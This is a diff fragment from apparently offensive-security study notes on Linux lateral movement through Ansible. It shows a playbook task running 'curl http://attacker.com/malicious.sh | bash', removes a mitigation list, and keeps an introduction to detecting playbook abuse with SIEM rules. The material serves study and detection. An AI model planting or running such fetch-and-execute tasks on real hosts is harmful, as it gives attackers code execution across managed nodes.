rogdooley/OSEP-Code-And-Notes/Notes/Modules/14 Linux Lateral Movement.md

       shell: |
         curl http://attacker.com/malicious.sh | bash
 ```

-### **Mitigation Strategies**:
-- **Use Ansible Vault**: Encrypt sensitive information in playbooks and inventory files using Ansible Vault.
-- **Restrict Permissions**: Limit who can edit playbooks and what commands can be run, especially when using `become: true`.
-- **Code Reviews**: Regularly review playbooks for security issues, especially when using modules that execute commands.
-- **Logging and Monitoring**: Keep logs of all Ansible operations and monitor for unusual activity.

-By understanding these concepts, you can both leverage Ansible's automation power and ensure that playbooks are secure from exploitation.

 An attacker with access to Ansible playbooks could leverage them to control, enumerate, or exploit node machines in various ways.
 Understanding these methods and how to detect them can help you implement SIEM rules to catch such activities.
 Here's how attackers might use playbooks for malicious purposes, along with suggestions for SIEM rules to detect these actions: